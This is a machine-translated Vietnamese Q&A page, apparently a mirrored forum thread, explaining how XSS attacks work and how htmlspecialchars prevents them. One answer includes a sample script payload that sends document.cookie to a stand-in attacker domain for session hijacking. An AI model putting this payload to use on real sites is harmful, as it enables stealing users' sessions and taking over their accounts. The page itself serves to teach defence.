Vì vậy, ngăn chặn trang web tấn công XSS rất đơn giản, bạn chỉ cần sử dụng chức năng htmlspecialchars
và bạn tốt.
Nhưng nếu nhà phát triển quên sử dụng nó, kẻ tấn công/hacker có thể làm gì? Anh ấy có thể nhận session_id của bạn, đúng không? Và đây là một câu hỏi. Anh ta có thể làm gì với điều đó?
Cảm ơn bạn rất nhiều.Tấn công XSS thực sự hoạt động như thế nào?
Trả lời
Vì vậy, ngăn trang web tấn công XSS rất đơn giản, bạn chỉ cần sử dụng chức năng htmlspecialchars và bạn tốt.
Phải. Sử dụng nó ở mọi nơi khi bạn định hiển thị lại đầu vào do người dùng kiểm soát. Điều này liên quan đến tất cả các phần của yêu cầu HTTP: tiêu đề, nội dung và thông số.
Nhưng nếu nhà phát triển quên sử dụng, kẻ tấn công/hacker có thể làm gì?
Bạn có thể chèn một số mã HTML/tập lệnh độc hại. Ví dụ.những điều sau đây trong một số thư/nhận xét tại một trang web:
<script>document.write('<img src="http://hackersdomain.com/fake.gif?' + escape(document.cookie) + '" width=0 height=0>');</script>
Ở trên sẽ yêu cầu một hình ảnh từ miền mailicious cùng với cookie tài liệu làm chuỗi truy vấn.
Anh ấy có thể nhận session_id của bạn, đúng không? Và đây là một câu hỏi. Anh ta có thể làm gì với điều đó?
ID phiên được lưu trữ trong cookie. Khi tin tặc được thông báo về hình ảnh đã được yêu cầu với cookie trong chuỗi truy vấn, tất cả những gì anh ta phải làm chỉ là chỉnh sửa cookie của trình duyệt để bao gồm cùng một ID phiên để đăng nhập với tư cách người dùng ban đầu. Điều này rõ ràng là rất nguy hiểm nếu người dùng ban đầu là quản trị viên trang web.
Bắt đầu đọc về XSS đây: http://en.wikipedia.org/wiki/XSS và http://en.wikipedia.org/wiki/Cross-site_scripting
Attacker A nhận thành viên B để truy cập trang web của C với chứng chỉ B qua URI được xây dựng một cách cẩn thận của một.
Sau đó, người dùng có thể chạy bất kỳ JS nào họ thích trên C bằng thông tin đăng nhập của B.
này cho phép họ:
- hiện bất kỳ thông tin mà họ muốn đến B như thể nó đến từ C
- Chuẩn bị trình duyệt của B để gửi bất kỳ thông tin họ muốn từ C đến A Tài khoản
- chi tiết
- Thông tin cá nhân
- Gửi bất kỳ hướng dẫn nào vào trang web C như nếu nó đến từ A
- Xuất bản thư rác này
- Chuyển tiền vào tài khoản này
- Mua sách điện tử rất tốn kém này
Nếu bạn có một lỗ hổng XSS trên của bạn trang web, sau đó tin tặc có thể chèn bất kỳ HTML nào vào trang, bao gồm thẻ <script>
. Nếu tôi đăng nhập vào trang web của bạn và truy cập trang bị tấn công, trình duyệt của tôi sẽ chạy JavaScript được chèn bởi hacker và làm cho trình duyệt của tôi làm bất cứ điều gì mà hacker dự định.
Chẳng hạn như gửi yêu cầu POST tới máy chủ của bạn để thay đổi mật khẩu, sau đó tải URL từ máy chủ của hacker để thông báo cho anh ấy số tài khoản của tôi để anh ấy có thể đăng nhập và lấy cắp tài khoản của tôi.
Đây là explenation tốt nhất của XSS mà tôi từng gặp: Flash Animation Example
Đây là Second Video
- 1. Ngăn chặn các cuộc tấn công XSS
- 2. Giải mã cuộc tấn công XSS này
- 3. Biến động thực sự hoạt động như thế nào?
- 4. Tùy chọn "-j" thực sự hoạt động như thế nào?
- 5. ngăn chặn cuộc tấn công XSS qua url (PHP)
- 6. Binding thực sự hoạt động như thế nào?
- 7. JavaScript [] thực sự hoạt động như thế nào?
- 8. Multisample thực sự hoạt động như thế nào?
- 9. Lớp Perl này thực sự hoạt động như thế nào?
- 10. .NET ExecutionContext thực sự hoạt động như thế nào?
- 11. ngẫu nhiên() thực sự hoạt động như thế nào?
- 12. MongoDB thực sự hoạt động như thế nào?
- 13. Các bitmap thực sự hoạt động như thế nào?
- 14. RVM và rbenv thực sự hoạt động như thế nào?
- 15. Ngăn chặn các cuộc tấn công Javascript và XSS
- 16. tấn công XSS và phong cách thuộc tính
- 17. XSS tấn công với javascript trong img src thuộc tính
- 18. Chú thích là gì và chúng thực sự hoạt động như thế nào cho các khung công tác như Spring?
- 19. Công việc "respond_with_navigational" hoạt động như thế nào?
- 20. Công cụ mô phỏng Simulink hoạt động như thế nào?
- 21. Công cụ random.Random.seed của python hoạt động như thế nào?
- 22. Công việc Request.IsAuthenticated hoạt động như thế nào?
- 23. Tại sao mã hóa HTML ngăn chặn các cuộc tấn công XSS nhất định?
- 24. Công việc SETLOCAL và ENABLEDELAYEDEXPANSION hoạt động như thế nào?
- 25. Tiêu đề() hoạt động như thế nào?
- 26. Công cụ MatchEvaluator trong Regex.Replace hoạt động như thế nào?
- 27. Sự kiện máy chủ gửi thực sự hoạt động như thế nào?
- 28. DirectX - VertexBuffer hoạt động như thế nào?
- 29. Công việc xếp tầng "này" hoạt động như thế nào?
- 30. Xác thực trong ASP.NET MVC 2 thực sự hoạt động như thế nào?
Hey, những gì nếu tôi sử dụng 'ini_set ('session.use_only_cookies', 1);' trong tôi kịch bản? Tuy nhiên, 'document.cookie' sẽ hoạt động? –